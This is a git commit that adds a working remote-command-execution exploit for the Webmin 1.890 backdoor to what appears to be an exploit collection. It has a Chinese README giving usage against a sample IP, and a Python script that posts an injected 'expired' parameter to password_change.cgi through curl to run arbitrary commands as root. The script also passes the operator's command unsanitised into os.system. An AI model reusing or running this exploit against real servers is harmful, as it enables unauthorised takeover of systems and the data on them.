add Webmin 1.890 RCE

2022-06-29 15:40:03 +08:00 · 2022-06-29 15:40:03 +08:00 · e2c80b6751
commit e2c80b6751
parent 0fc7f155d7
3 changed files with 41 additions and 0 deletions
--- a/CMS/Webmin/README.md
+++ b/CMS/Webmin/README.md
@ -0,0 +1,11 @@
+# Webmin 1.890 RCE
+
+## 供应链攻击的典型案例，值得收录
+
+### exp 使用
+```shell
+python3 exploit.py http://10.0.0.1:10000 id
+```
+
+服务器返回结果如下：
+![](images/服务器返回内容.png)
--- a/CMS/Webmin/exploit.py
+++ b/CMS/Webmin/exploit.py
@ -0,0 +1,30 @@
+#!/usr/bin/env python3
+import os
+import sys
+
+
+STAIN = """
+WebMin 1.890-expired-remote-root
+"""
+usage = """Usage: python3 exploit.py target COMMAND
+
+Ex: python3 exploit.py http://10.0.0.1:10000 id
+                                                                                                                                   
+"""
+
+def exploit(target, url, command):
+    header = 'Referer: {}/session_login.cgi'.format(target)
+    payload = 'user=gotroot&pam=&expired=2|echo "";{}'.format(command)
+    os.system("curl -k {} -d '{}' -H '{}'".format(url,payload,header))
+
+
+if __name__ == '__main__':
+    try:
+        print(STAIN)
+        target = sys.argv[1].rstrip("/")
+        url = target+"/password_change.cgi"
+        command = sys.argv[2]
+        exploit(target, url, command)
+    except:
+        print(STAIN)
+        print(usage)
--- a/CMS/Webmin/images/服务器返回内容.png
+++ b/CMS/Webmin/images/服务器返回内容.png